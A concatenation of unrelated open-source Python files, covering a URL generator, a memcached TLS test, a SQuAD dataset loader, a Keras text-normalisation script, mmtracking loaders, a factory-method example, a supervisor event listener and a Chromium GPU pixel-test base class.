'range': self._process_range,
'settings': self._process_setting,
'spider_args': self._process_args
}
self.settings = settings
self.spider_args = spider_args
def _process_date(self, values):
now = datetime.now()
return [now.strftime(v) for v in values]
def _process_default(self, values):
return [str(values[0])]
def _process_option(self, values):
return [str(v) for v in values]
def _process_range(self, values):
if len(values) > 3:
return []
return six.moves.range(*values)
def _process_setting(self, values):
if self.settings is None:
return []
results = []
for value in values:
results.extend(self.settings.getlist(value))
return results
def _process_args(self, values):
if self.spider_args is None:
return []
results = []
for value in values:
results.extend(arg_to_iter(self.spider_args.get(value, [])))
return results
def _build_section(self, descriptor, params=False):
if 'type' not in descriptor or 'values' not in descriptor:
return [] # Malformed descriptor
processor = self._processors.get(descriptor['type'])
if processor is None:
return []
processed = processor(descriptor['values'])
if not params:
return processed
if 'name' not in descriptor:
return []
return izip_longest([], processed, fillvalue=descriptor['name'])
def _generate_urls(self, template, paths, params_template, params):
path_length = len(paths)
if params and not paths:
components = product(*params)
else:
components = product(*chain(paths, params))
for values in components:
url = template.format(*values[:path_length])
params = values[path_length:]
if params_template or params:
url_params = OrderedDict(params_template)
for name, value in params:
url_params[name] = value
url_params = urlencode(url_params)
yield '{}?{}'.format(url, url_params)
else:
yield url
def __call__(self, spec):
template = spec['template']
param = spec.get('params_template', {})
paths = [self._build_section(d) for d in spec.get('paths', [])]
params = [self._build_section(d, True) for d in spec.get('params', [])]
url_generator = self._generate_urls(template, paths, param, params)
return url_generator
generator = UrlGenerator()
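# A minimal usage sketch (not part of the original module). The spec below is
# illustrative only: a 'range' descriptor fills the path placeholder and an
# 'options' descriptor expands into a query parameter on top of params_template.
if __name__ == "__main__":
    example_spec = {
        "template": "http://example.com/products/{}",
        "paths": [
            {"type": "range", "values": [1, 4]},  # pages 1, 2, 3
        ],
        "params": [
            {"type": "options", "name": "sort", "values": ["price", "rating"]},
        ],
        "params_template": {"lang": "en"},
    }
    for url in generator(example_spec):
        print(url)  # e.g. http://example.com/products/1?lang=en&sort=price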
|
test/test_tls.py | alexmv/python-binary-memcached | 103 | 12748707 | import os
import pytest
import subprocess
import ssl
import time
import trustme
import bmemcached
import test_simple_functions
ca = trustme.CA()
server_cert = ca.issue_cert(os.environ["MEMCACHED_HOST"] + u"")
@pytest.yield_fixture(scope="module", autouse=True)
def memcached_tls():
key = server_cert.private_key_pem
cert = server_cert.cert_chain_pems[0]
with cert.tempfile() as c, key.tempfile() as k:
p = subprocess.Popen(
[
"memcached",
"-p5001",
"-Z",
"-o",
"ssl_key={}".format(k),
"-o",
"ssl_chain_cert={}".format(c),
"-o",
"ssl_verify_mode=1",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
time.sleep(0.1)
if p.poll() is not None:
pytest.skip("Memcached server is not built with TLS support.")
yield p
p.kill()
p.wait()
class TLSMemcachedTests(test_simple_functions.MemcachedTests):
"""
Same tests as above, just make sure it works with TLS.
"""
def setUp(self):
ctx = ssl.create_default_context()
ca.configure_trust(ctx)
self.server = "{}:5001".format(os.environ["MEMCACHED_HOST"])
self.client = bmemcached.Client(self.server, tls_context=ctx)
self.reset()
|
dataset/squad_dataset.py | jamaalhay/Final_Proj | 104 | 12748718 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'han'
import os
import h5py
import math
import torch
import torch.utils.data
from torch.utils.data.sampler import Sampler, SequentialSampler
import logging
import pandas as pd
from dataset.preprocess_data import PreprocessData
from utils.functions import *
logger = logging.getLogger(__name__)
class SquadDataset:
"""
dataset module for SQuAD
"""
def __init__(self, global_config):
self._data = {}
self._attr = {}
self.meta_data = {}
self.global_config = global_config
# whether preprocessing squad dataset
is_exist_dataset_h5 = os.path.exists(self.global_config['data']['dataset_h5'])
assert is_exist_dataset_h5, 'not found dataset hdf5 file in %s' % self.global_config['data']['dataset_h5']
self._load_hdf5()
def _load_hdf5(self):
"""
load squad hdf5 file
:return:
"""
squad_h5_path = self.global_config['data']['dataset_h5']
with h5py.File(squad_h5_path, 'r') as f:
f_data = f['data']
for name in ['train', 'dev']:
self._data[name] = {}
for sub_name in ['answer_range', 'samples_id']:
self._data[name][sub_name] = np.array(f_data[name][sub_name])
for sub_name in ['context', 'question']:
cur_data = f_data[name][sub_name]
self._data[name][sub_name] = {}
# 'token', 'pos', 'ent', 'em', 'em_lemma', 'right_space'
for subsub_name in cur_data.keys():
self._data[name][sub_name][subsub_name] = np.array(cur_data[subsub_name])
for key, value in f.attrs.items():
self._attr[key] = value
# 'id2word', 'id2char', 'id2pos', 'id2ent'
for key in f['meta_data'].keys():
self.meta_data[key] = np.array(f['meta_data'][key])
self._char2id = dict(zip(self.meta_data['id2char'],
range(len(self.meta_data['id2char']))))
def get_dataloader_train(self, batch_size, num_workers):
"""
a train data dataloader
:param batch_size:
:return:
"""
return self.get_dataloader(batch_size, 'train', num_workers, shuffle=True)
def get_dataloader_dev(self, batch_size, num_workers):
"""
a dev data dataloader
:param batch_size:
:return:
"""
return self.get_dataloader(batch_size, 'dev', num_workers, shuffle=False)
def get_dataloader(self, batch_size, type, num_workers, shuffle):
"""
get dataloader on train or dev dataset
:param batch_size:
:param type: 'train' or 'dev'
:return:
"""
data = self._data[type]
dataset = CQA_Dataset(data['context'],
data['question'],
data['answer_range'],
self.meta_data,
self.global_config['preprocess'])
if shuffle:
sampler = SortedBatchSampler(dataset.get_lengths(), batch_size)
else:
sampler = SequentialSampler(dataset)
dataloader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size,
sampler=sampler,
collate_fn=self.collect_fun,
num_workers=num_workers)
return dataloader
def collect_fun(self, batch):
"""
collect function for DataLoader, will generate char idx currently
:param batch:
:return:
"""
context = []
context_f = []
question = []
question_f = []
answer_range = []
for ele in batch:
context.append(ele[0])
question.append(ele[1])
context_f.append(ele[2])
question_f.append(ele[3])
answer_range.append(ele[4])
# word idx
bat_context, max_ct_len = del_zeros_right(torch.stack(context, dim=0))
bat_question, max_qt_len = del_zeros_right(torch.stack(question, dim=0))
bat_answer, _ = del_zeros_right(torch.stack(answer_range, dim=0))
# additional features
bat_context_f = None
bat_question_f = None
if context_f[0] is not None:
bat_context_f = torch.stack(context_f, dim=0)[:, 0:max_ct_len, :]
bat_question_f = torch.stack(question_f, dim=0)[:, 0:max_qt_len, :]
# generate char idx
bat_context_char = None
bat_question_char = None
if self.global_config['preprocess']['use_char']:
bat_context_char = self._batch_word_to_char(bat_context)
bat_question_char = self._batch_word_to_char(bat_question)
return bat_context, bat_question, bat_context_char, bat_question_char, bat_context_f, bat_question_f, bat_answer
def get_batch_train(self, batch_size):
"""
a train data batch
.. warning::
This method is now deprecated in favor of
:func:`get_dataloader_train`.
"""
return self.get_batch_data(batch_size, 'train')
def get_batch_dev(self, batch_size):
"""
development data batch
.. warning::
This method is now deprecated in favor of
:func:`get_dataloader_dev`.
"""
return self.get_batch_data(batch_size, 'dev')
def get_batch_data(self, batch_size, type):
"""
same with BatchSampler
.. warning::
This method is now deprecated in favor of
:func:`BatchSampler` and `get_dataloader`.
"""
data = self._data[type]
data_size = len(data['context'])
i = 0
while i < data_size:
j = min(i + batch_size, data_size)
bat = [data['context'][i:j], data['question'][i:j], data['answer_range'][i:j]]
bat_tensor = [to_long_tensor(x) for x in bat]
i = j
yield bat_tensor
def get_all_samples_id_train(self):
return self.get_all_samples_id('train')
def get_all_samples_id_dev(self):
return self.get_all_samples_id('dev')
def get_all_samples_id(self, type):
"""
get samples id of 'train' or 'dev' data
:param type:
:return:
"""
data = self._data[type]
return data['samples_id']
def get_all_ct_right_space_train(self):
return self.get_all_ct_right_space('train')
def get_all_ct_right_space_dev(self):
return self.get_all_ct_right_space('dev')
def get_all_ct_right_space(self, type):
data = self._data[type]
return data['context']['right_space']
def get_train_batch_cnt(self, batch_size):
"""
get count of train batches
:param batch_size: single batch size
:return: count
"""
data_size = self._attr['train_size']
cnt_batch = math.ceil(data_size * 1.0 / batch_size)
return cnt_batch
def get_dev_batch_cnt(self, batch_size):
"""
get count of dev batches
:param batch_size: single batch size
:return: count
"""
data_size = self._attr['dev_size']
cnt_batch = math.ceil(data_size * 1.0 / batch_size)
return cnt_batch
def _batch_word_to_char(self, batch_wordid):
"""
transform batch with sentence of wordid to batch data with sentence of char id
:param batch_wordid: (batch, seq_len), torch tensor
:return: (batch, seq_len, word_len), torch tensor
"""
batch_wordid = batch_wordid.numpy()
batch_word = [self.sentence_id2word(x) for x in batch_wordid]
batch_length = [[len(x) if x != PreprocessData.padding else 0 for x in s] for s in batch_word]
batch_max_len = np.max(batch_length)
batch_char = list(map(lambda x: self.sentence_char2id(x, max_len=batch_max_len), batch_word))
batch_char = np.stack(batch_char, axis=0)
return to_long_tensor(batch_char)
def gen_batch_with_char(self, batch_data, enable_char, device):
"""
        word batch to generate char batch, also move to device, used in train or valid steps
.. warning::
This method is now deprecated in favor of collect function in DataLoader
"""
batch_data = [del_zeros_right(x)[0] for x in batch_data]
if not enable_char:
bat_context, bat_question, bat_answer_range = [x.to(device) for x in batch_data]
bat_context_char = None
bat_question_char = None
else:
bat_context, bat_question, bat_answer_range = batch_data
bat_context_char = self._batch_word_to_char(bat_context)
bat_question_char = self._batch_word_to_char(bat_question)
bat_context, bat_question, bat_context_char, bat_question_char, bat_answer_range = [x.to(device) for x in
[bat_context,
bat_question,
bat_context_char,
bat_question_char,
bat_answer_range]]
return bat_context, bat_question, bat_context_char, bat_question_char, bat_answer_range
def sentence_id2word(self, s_id):
"""
transform a sentence with word id to a sentence with real word
:param s_id:
:return:
"""
s = map(lambda id: self.meta_data['id2word'][id], s_id)
return list(s)
def sentence_word2id(self, s):
"""
transform a sentence with word to a sentence with word id
(Note that it's a slow version when using np.where)
:param s:
:return:
"""
s_id = map(lambda word: np.where(self.meta_data['id2word'] == word)[0][0], s)
return np.array(list(s_id))
def word_id2char(self, w_id):
w = map(lambda id: self.meta_data['id2char'][id], w_id)
return list(w)
def word_char2id(self, w):
if w == PreprocessData.padding: # not actual word
            return np.ones(1, )  # make sure word length > 0; for padding, any non-zero value works and has no effect
w_id = map(lambda ch: self._char2id[ch], w)
return np.array(list(w_id))
def sentence_char2id(self, s, max_len=None):
s_cid = list(map(lambda w: self.word_char2id(w), s))
if max_len is None:
word_len = list(map(lambda x: len(x), s_cid))
max_len = np.max(word_len)
s_cid_pad = map(lambda x: np.pad(x, (0, max_len - len(x)), 'constant', constant_values=(0, 0)), s_cid)
return np.stack(list(s_cid_pad), axis=0)
def gather_context_seq_len(self, type, steps=None):
"""
gather the context sequence counts with different lengths
:param type: 'train' or 'dev' data
:param steps: set to None means default steps
:return:
"""
data = self._data[type]
context = to_long_tensor(data['context']['token'])
mask = compute_mask(context)
lengths = mask.eq(1).long().sum(1).squeeze()
length_pd = pd.DataFrame(data=lengths.numpy(), columns=['length'])
if steps is None:
steps = [0, 100, 200, 300, 400, 500, 600, 700, 800]
assert len(steps) > 0
# get step length cnt
real_step = []
step_length_cnt = []
for i in range(1, len(steps)):
lower_bound = steps[i - 1]
upper_bound = steps[i]
assert lower_bound < upper_bound # [lower_bound, upper_bound)
real_step.append((lower_bound, upper_bound))
valid = length_pd[(length_pd['length'] < upper_bound) & (length_pd['length'] >= lower_bound)]
tmp_cnt = valid.shape[0]
step_length_cnt.append(tmp_cnt)
rtn_step_length = list(zip(real_step, step_length_cnt))
# get all length cnt
length_cnt = length_pd['length'].value_counts().to_frame(name='cnt')
length_cnt['length'] = length_cnt.index
return rtn_step_length, length_cnt
def gather_answer_seq_len(self, type, max_len=None):
"""
gather the answer sequence counts with different lengths
:param type: 'train' or 'dev' data
:param max_len:
:return:
"""
data = self._data[type]
answer_range = data['answer_range']
lengths = []
for i in range(answer_range.shape[0]):
tmp_lens = []
for j in range(int(answer_range.shape[1] / 2)):
if answer_range[i, j * 2] != -1:
tmp_lens.append(answer_range[i, j * 2 + 1] - answer_range[i, j * 2] + 1)
lengths.append(min(tmp_lens))
length_pd = pd.DataFrame(data=lengths, columns=['length'])
# get all length cnt
length_cnt = length_pd['length'].value_counts().to_frame(name='cnt')
length_cnt['length'] = length_cnt.index
length_cnt = length_cnt.sort_index()
if max_len is not None:
sum_len = length_cnt[length_cnt['length'] >= max_len]['cnt'].sum()
length_cnt = length_cnt[length_cnt['length'] < max_len]
length_cnt.loc[max_len] = [sum_len, '>=%d' % max_len]
return length_cnt
class CQA_Dataset(torch.utils.data.Dataset):
"""
squad like dataset, used for dataloader
Args:
- context: (batch, ct_len)
- question: (batch, qt_len)
- answer_range: (batch, ans_len)
"""
def __init__(self, context, question, answer_range, feature_dict, config):
self.context = context
self.question = question
self.answer_range = answer_range
self.feature_dict = feature_dict
self.config = config
self.lengths = self.get_lengths()
def __getitem__(self, index):
cur_context = to_long_tensor(self.context['token'][index])
cur_question = to_long_tensor(self.question['token'][index])
cur_answer = to_long_tensor(self.answer_range[index])
cur_context_f, cur_question_f = self.addition_feature(index)
return cur_context, cur_question, cur_context_f, cur_question_f, cur_answer
def __len__(self):
return self.answer_range.shape[0]
def get_lengths(self):
ct_mask = self.context['token'].__ne__(PreprocessData.padding_idx)
ct_lengths = ct_mask.sum(1)
qt_mask = self.question['token'].__ne__(PreprocessData.padding_idx)
qt_lengths = qt_mask.sum(1)
lengths = np.stack([ct_lengths, qt_lengths])
return lengths
def addition_feature(self, index):
data = [self.context, self.question]
add_features = [None, None]
for k in range(len(data)):
features = {}
tmp_seq_len = data[k]['token'].shape[1]
if self.config['use_pos']:
features['pos'] = torch.zeros((tmp_seq_len, len(self.feature_dict['id2pos'])), dtype=torch.float)
for i, ele in enumerate(data[k]['pos'][index]):
if ele == PreprocessData.padding_idx:
break
features['pos'][i, ele] = 1
if self.config['use_ent']:
features['ent'] = torch.zeros((tmp_seq_len, len(self.feature_dict['id2ent'])), dtype=torch.float)
for i, ele in enumerate(data[k]['ent'][index]):
if ele == PreprocessData.padding_idx:
break
features['ent'][i, ele] = 1
if self.config['use_em']:
features['em'] = to_float_tensor(data[k]['em'][index]).unsqueeze(-1)
if self.config['use_em_lemma']:
features['em_lemma'] = to_float_tensor(data[k]['em_lemma'][index]).unsqueeze(-1)
if len(features) > 0:
add_features[k] = torch.cat(list(features.values()), dim=-1)
return add_features
class SortedBatchSampler(Sampler):
"""
forked from https://github.com/HKUST-KnowComp/MnemonicReader
"""
def __init__(self, lengths, batch_size, shuffle=True):
self.lengths = lengths # (2, data_num)
self.batch_size = batch_size
self.shuffle = shuffle
def __iter__(self):
lengths = np.array(
[(-l[0], -l[1], np.random.random()) for l in self.lengths.T],
dtype=[('l1', np.int_), ('l2', np.int_), ('rand', np.float_)]
)
indices = np.argsort(lengths, order=('l1', 'l2', 'rand'))
batches = [indices[i:i + self.batch_size]
for i in range(0, len(indices), self.batch_size)]
last = batches[-1] # last batch may not be full batch size
if self.shuffle:
batches = batches[:len(batches)-1]
np.random.shuffle(batches)
batches.append(last)
return iter([i for batch in batches for i in batch])
def __len__(self):
return self.lengths.shape[1]
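# A minimal usage sketch (not part of the original module). The config keys
# mirror the ones read above; the hdf5 path and preprocess flags are assumptions
# and must point at an actual preprocessed SQuAD hdf5 file.
if __name__ == "__main__":
    example_config = {
        "data": {"dataset_h5": "data/squad_dataset.h5"},  # hypothetical path
        "preprocess": {"use_char": True, "use_pos": False, "use_ent": False,
                       "use_em": False, "use_em_lemma": False},
    }
    dataset = SquadDataset(example_config)
    train_loader = dataset.get_dataloader_train(batch_size=32, num_workers=2)
    for context, question, context_char, question_char, context_f, question_f, answer in train_loader:
        print(context.shape, question.shape, answer.shape)
        break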
|
38-neuro-monolithic/tf-38-learning.py | cyyeh/exercises-in-programming-style | 1,821 | 12748783 | <gh_stars>1000+
from keras.models import Sequential
from keras.layers import Dense
from keras.losses import binary_crossentropy, categorical_crossentropy
from keras.optimizers import SGD
from keras.metrics import top_k_categorical_accuracy
from keras import backend as K
import numpy as np
import sys, os, string, random
characters = string.printable
char_indices = dict((c, i) for i, c in enumerate(characters))
indices_char = dict((i, c) for i, c in enumerate(characters))
INPUT_VOCAB_SIZE = len(characters)
LINE_SIZE = 80
BATCH_SIZE = 200
STEPS_PER_EPOCH = 5000
EPOCHS = 4
def encode_one_hot(line):
x = np.zeros((1, LINE_SIZE, INPUT_VOCAB_SIZE))
sp_idx = char_indices[' ']
for i, c in enumerate(line):
index = char_indices[c] if c in characters else sp_idx
x[0][i][index] = 1
# Pad with spaces
for i in range(len(line), LINE_SIZE):
x[0][i][sp_idx] = 1
return x.reshape([1, LINE_SIZE*INPUT_VOCAB_SIZE])
def decode_one_hot(y):
s = []
x = y.reshape([1, LINE_SIZE, INPUT_VOCAB_SIZE])
for onehot in x[0]:
one_index = np.argmax(onehot)
s.append(indices_char[one_index])
return ''.join(s)
def input_generator(nsamples):
def generate_line():
inline = []; outline = []
for _ in range(LINE_SIZE):
c = random.choice(characters)
expected = c.lower() if c in string.ascii_letters else ' '
inline.append(c); outline.append(expected)
for i in range(LINE_SIZE):
if outline[i] == ' ': continue
if i > 0 and i < LINE_SIZE - 1:
outline[i] = ' ' if outline[i-1] == ' ' and outline[i+1] == ' ' else outline[i]
if (i == 0 and outline[i+1] == ' ') or (i == LINE_SIZE-1 and outline[i-1] == ' '):
outline[i] = ' '
return ''.join(inline), ''.join(outline)
while True:
data_in = np.zeros((nsamples, LINE_SIZE * INPUT_VOCAB_SIZE))
data_out = np.zeros((nsamples, LINE_SIZE * INPUT_VOCAB_SIZE))
for i in range(nsamples):
input_data, expected = generate_line()
data_in[i] = encode_one_hot(input_data)[0]
data_out[i] = encode_one_hot(expected)[0]
yield data_in, data_out
def train(model):
model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
input_gen = input_generator(BATCH_SIZE)
validation_gen = input_generator(BATCH_SIZE)
model.fit_generator(input_gen,
epochs = EPOCHS, workers=1,
steps_per_epoch = STEPS_PER_EPOCH,
validation_data = validation_gen,
validation_steps = 10)
def build_model():
# Normalize characters using a dense layer
model = Sequential()
model.add(Dense(LINE_SIZE*INPUT_VOCAB_SIZE,
input_shape=(LINE_SIZE*INPUT_VOCAB_SIZE,),
activation='sigmoid'))
return model
def build_deep_model():
# Normalize characters using a dense layer
model = Sequential()
model.add(Dense(80,
input_shape=(LINE_SIZE*INPUT_VOCAB_SIZE,),
activation='sigmoid'))
model.add(Dense(800, activation='sigmoid'))
model.add(Dense(LINE_SIZE*INPUT_VOCAB_SIZE, activation='sigmoid'))
return model
model = build_deep_model()
model.summary()
train(model)
input("Network has been trained. Press <Enter> to run program.")
with open(sys.argv[1]) as f:
for line in f:
if line.isspace(): continue
batch = encode_one_hot(line)
preds = model.predict(batch)
normal = decode_one_hot(preds)
print(normal) |
mmtrack/datasets/pipelines/loading.py | BigBen0519/mmtracking | 2,226 | 12748787 | <filename>mmtrack/datasets/pipelines/loading.py
# Copyright (c) OpenMMLab. All rights reserved.
from mmdet.datasets.builder import PIPELINES
from mmdet.datasets.pipelines import LoadAnnotations, LoadImageFromFile
from mmtrack.core import results2outs
@PIPELINES.register_module()
class LoadMultiImagesFromFile(LoadImageFromFile):
"""Load multi images from file.
Please refer to `mmdet.datasets.pipelines.loading.py:LoadImageFromFile`
for detailed docstring.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def __call__(self, results):
"""Call function.
For each dict in `results`, call the call function of
`LoadImageFromFile` to load image.
Args:
results (list[dict]): List of dict from
:obj:`mmtrack.CocoVideoDataset`.
Returns:
list[dict]: List of dict that contains loaded image.
"""
outs = []
for _results in results:
_results = super().__call__(_results)
outs.append(_results)
return outs
@PIPELINES.register_module()
class SeqLoadAnnotations(LoadAnnotations):
"""Sequence load annotations.
Please refer to `mmdet.datasets.pipelines.loading.py:LoadAnnotations`
for detailed docstring.
Args:
with_track (bool): If True, load instance ids of bboxes.
"""
def __init__(self, with_track=False, *args, **kwargs):
super().__init__(*args, **kwargs)
self.with_track = with_track
def _load_track(self, results):
"""Private function to load label annotations.
Args:
results (dict): Result dict from :obj:`mmtrack.CocoVideoDataset`.
Returns:
dict: The dict contains loaded label annotations.
"""
results['gt_instance_ids'] = results['ann_info']['instance_ids'].copy()
return results
def __call__(self, results):
"""Call function.
For each dict in results, call the call function of `LoadAnnotations`
to load annotation.
Args:
results (list[dict]): List of dict that from
:obj:`mmtrack.CocoVideoDataset`.
Returns:
list[dict]: List of dict that contains loaded annotations, such as
bounding boxes, labels, instance ids, masks and semantic
segmentation annotations.
"""
outs = []
for _results in results:
_results = super().__call__(_results)
if self.with_track:
_results = self._load_track(_results)
outs.append(_results)
return outs
@PIPELINES.register_module()
class LoadDetections(object):
"""Load public detections from MOT benchmark.
Args:
results (dict): Result dict from :obj:`mmtrack.CocoVideoDataset`.
"""
def __call__(self, results):
outs_det = results2outs(bbox_results=results['detections'])
bboxes = outs_det['bboxes']
labels = outs_det['labels']
results['public_bboxes'] = bboxes[:, :4]
if bboxes.shape[1] > 4:
results['public_scores'] = bboxes[:, -1]
results['public_labels'] = labels
results['bbox_fields'].append('public_bboxes')
return results
|
Creational/Factory-Method/python/FactoryMethod.py | Hkataya/design-patterns | 294 | 12748796 | <reponame>Hkataya/design-patterns<filename>Creational/Factory-Method/python/FactoryMethod.py
from abc import ABC, abstractmethod
class Creator(ABC):
def some_operation(self):
product = self.create_product()
product.do_stuff()
@abstractmethod
def create_product(self):
pass
class Product(ABC):
@abstractmethod
def do_stuff(self):
pass
class ConcreteProductAlpha(Product):
def do_stuff(self):
print("Stuff of product Alpha")
class ConcreteCreatorAlpha(Creator):
def create_product(self):
return ConcreteProductAlpha()
class ConcreteProductBeta(Product):
def do_stuff(self):
print("Stuff of product Beta")
class ConcreteCreatorBeta(Creator):
def create_product(self):
return ConcreteProductBeta()
def main():
creatorAlpha = ConcreteCreatorAlpha()
creatorAlpha.some_operation()
creatorBeta = ConcreteCreatorBeta()
creatorBeta.some_operation()
if __name__ == "__main__":
main()
|
supervisor/scripts/sample_exiting_eventlistener.py | LexMachinaInc/supervisor | 365 | 12748826 | <filename>supervisor/scripts/sample_exiting_eventlistener.py
#!/usr/bin/env python
# A sample long-running supervisor event listener which demonstrates
# how to accept event notifications from supervisor and how to respond
# properly. It is the same as the sample_eventlistener.py script
# except it exits after each request (presumably to be restarted by
# supervisor). This demonstration does *not* use the
# supervisor.childutils module, which wraps the specifics of
# communications in higher-level API functions. If your listeners are
# implemented using Python, it is recommended that you use the
# childutils module API instead of modeling your scripts on the
# lower-level protocol example below.
import sys
def write_stdout(s):
sys.stdout.write(s)
sys.stdout.flush()
def write_stderr(s):
sys.stderr.write(s)
sys.stderr.flush()
def main():
write_stdout('READY\n') # transition from ACKNOWLEDGED to READY
line = sys.stdin.readline() # read a line from stdin from supervisord
write_stderr(line) # print it out to stderr (testing only)
headers = dict([ x.split(':') for x in line.split() ])
data = sys.stdin.read(int(headers['len'])) # read the event payload
write_stderr(data) # print the event payload to stderr (testing only)
write_stdout('RESULT 2\nOK') # transition from READY to ACKNOWLEDGED
# exit, if the eventlistener process config has autorestart=true,
# it will be restarted by supervisord.
if __name__ == '__main__':
main()
|
content/test/gpu/gpu_tests/cloud_storage_test_base.py | iplo/Chain | 231 | 12748831 | <gh_stars>100-1000
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Base classes for a test and validator which upload results
(reference images, error images) to cloud storage."""
import os
import re
import tempfile
from telemetry import test
from telemetry.core import bitmap
from telemetry.page import cloud_storage
from telemetry.page import page_test
test_data_dir = os.path.abspath(os.path.join(
os.path.dirname(__file__), '..', '..', 'data', 'gpu'))
default_generated_data_dir = os.path.join(test_data_dir, 'generated')
error_image_cloud_storage_bucket = 'chromium-browser-gpu-tests'
class ValidatorBase(page_test.PageTest):
def __init__(self, test_method_name):
super(ValidatorBase, self).__init__(test_method_name)
# Parameters for cloud storage reference images.
self.vendor_id = None
self.device_id = None
self.vendor_string = None
self.device_string = None
self.msaa = False
###
### Routines working with the local disk (only used for local
### testing without a cloud storage account -- the bots do not use
### this code path).
###
def _UrlToImageName(self, url):
image_name = re.sub(r'^(http|https|file)://(/*)', '', url)
image_name = re.sub(r'\.\./', '', image_name)
image_name = re.sub(r'(\.|/|-)', '_', image_name)
return image_name
def _WriteImage(self, image_path, png_image):
output_dir = os.path.dirname(image_path)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
png_image.WritePngFile(image_path)
def _WriteErrorImages(self, img_dir, img_name, screenshot, ref_png):
full_image_name = img_name + '_' + str(self.options.build_revision)
full_image_name = full_image_name + '.png'
# Always write the failing image.
self._WriteImage(
os.path.join(img_dir, 'FAIL_' + full_image_name), screenshot)
if ref_png:
# Save the reference image.
# This ensures that we get the right revision number.
self._WriteImage(
os.path.join(img_dir, full_image_name), ref_png)
# Save the difference image.
diff_png = screenshot.Diff(ref_png)
self._WriteImage(
os.path.join(img_dir, 'DIFF_' + full_image_name), diff_png)
###
### Cloud storage code path -- the bots use this.
###
def _ComputeGpuInfo(self, tab):
if ((self.vendor_id and self.device_id) or
(self.vendor_string and self.device_string)):
return
browser = tab.browser
if not browser.supports_system_info:
raise Exception('System info must be supported by the browser')
system_info = browser.GetSystemInfo()
if not system_info.gpu:
raise Exception('GPU information was absent')
device = system_info.gpu.devices[0]
if device.vendor_id and device.device_id:
self.vendor_id = device.vendor_id
self.device_id = device.device_id
elif device.vendor_string and device.device_string:
self.vendor_string = device.vendor_string
self.device_string = device.device_string
else:
raise Exception('GPU device information was incomplete')
self.msaa = not (
'disable_multisampling' in system_info.gpu.driver_bug_workarounds)
def _FormatGpuInfo(self, tab):
self._ComputeGpuInfo(tab)
msaa_string = '_msaa' if self.msaa else '_non_msaa'
if self.vendor_id:
return '%s_%04x_%04x%s' % (
self.options.os_type, self.vendor_id, self.device_id, msaa_string)
else:
return '%s_%s_%s%s' % (
self.options.os_type, self.vendor_string, self.device_string,
msaa_string)
def _FormatReferenceImageName(self, img_name, page, tab):
return '%s_v%s_%s.png' % (
img_name,
page.revision,
self._FormatGpuInfo(tab))
def _UploadBitmapToCloudStorage(self, bucket, name, bitmap, public=False):
# This sequence of steps works on all platforms to write a temporary
# PNG to disk, following the pattern in bitmap_unittest.py. The key to
# avoiding PermissionErrors seems to be to not actually try to write to
# the temporary file object, but to re-open its name for all operations.
temp_file = tempfile.NamedTemporaryFile().name
bitmap.WritePngFile(temp_file)
cloud_storage.Insert(bucket, name, temp_file, publicly_readable=public)
def _ConditionallyUploadToCloudStorage(self, img_name, page, tab, screenshot):
"""Uploads the screenshot to cloud storage as the reference image
for this test, unless it already exists. Returns True if the
upload was actually performed."""
if not self.options.refimg_cloud_storage_bucket:
raise Exception('--refimg-cloud-storage-bucket argument is required')
cloud_name = self._FormatReferenceImageName(img_name, page, tab)
if not cloud_storage.Exists(self.options.refimg_cloud_storage_bucket,
cloud_name):
self._UploadBitmapToCloudStorage(self.options.refimg_cloud_storage_bucket,
cloud_name,
screenshot)
return True
return False
def _DownloadFromCloudStorage(self, img_name, page, tab):
"""Downloads the reference image for the given test from cloud
storage, returning it as a Telemetry Bitmap object."""
# TODO(kbr): there's a race condition between the deletion of the
# temporary file and gsutil's overwriting it.
if not self.options.refimg_cloud_storage_bucket:
raise Exception('--refimg-cloud-storage-bucket argument is required')
temp_file = tempfile.NamedTemporaryFile().name
cloud_storage.Get(self.options.refimg_cloud_storage_bucket,
self._FormatReferenceImageName(img_name, page, tab),
temp_file)
return bitmap.Bitmap.FromPngFile(temp_file)
def _UploadErrorImagesToCloudStorage(self, image_name, screenshot, ref_img):
"""For a failing run, uploads the failing image, reference image (if
supplied), and diff image (if reference image was supplied) to cloud
storage. This subsumes the functionality of the
archive_gpu_pixel_test_results.py script."""
machine_name = re.sub('\W+', '_', self.options.test_machine_name)
upload_dir = '%s_%s_telemetry' % (self.options.build_revision, machine_name)
base_bucket = '%s/runs/%s' % (error_image_cloud_storage_bucket, upload_dir)
image_name_with_revision = '%s_%s.png' % (
image_name, self.options.build_revision)
self._UploadBitmapToCloudStorage(
base_bucket + '/gen', image_name_with_revision, screenshot,
public=True)
if ref_img:
self._UploadBitmapToCloudStorage(
base_bucket + '/ref', image_name_with_revision, ref_img, public=True)
diff_img = screenshot.Diff(ref_img)
self._UploadBitmapToCloudStorage(
base_bucket + '/diff', image_name_with_revision, diff_img,
public=True)
print ('See http://%s.commondatastorage.googleapis.com/'
'view_test_results.html?%s for this run\'s test results') % (
error_image_cloud_storage_bucket, upload_dir)
class TestBase(test.Test):
@staticmethod
def _AddTestCommandLineOptions(parser, option_group):
option_group.add_option('--build-revision',
help='Chrome revision being tested.',
default="unknownrev")
option_group.add_option('--upload-refimg-to-cloud-storage',
dest='upload_refimg_to_cloud_storage',
action='store_true', default=False,
help='Upload resulting images to cloud storage as reference images')
option_group.add_option('--download-refimg-from-cloud-storage',
dest='download_refimg_from_cloud_storage',
action='store_true', default=False,
help='Download reference images from cloud storage')
option_group.add_option('--refimg-cloud-storage-bucket',
help='Name of the cloud storage bucket to use for reference images; '
'required with --upload-refimg-to-cloud-storage and '
'--download-refimg-from-cloud-storage. Example: '
'"chromium-gpu-archive/reference-images"')
option_group.add_option('--os-type',
help='Type of operating system on which the pixel test is being run, '
'used only to distinguish different operating systems with the same '
'graphics card. Any value is acceptable, but canonical values are '
'"win", "mac", and "linux", and probably, eventually, "chromeos" '
'and "android").',
default='')
option_group.add_option('--test-machine-name',
help='Name of the test machine. Specifying this argument causes this '
'script to upload failure images and diffs to cloud storage directly, '
'instead of relying on the archive_gpu_pixel_test_results.py script.',
default='')
option_group.add_option('--generated-dir',
help='Overrides the default on-disk location for generated test images '
'(only used for local testing without a cloud storage account)',
default=default_generated_data_dir)
|
arcade/drawing_support.py | janscas/arcade | 824 | 12748848 |
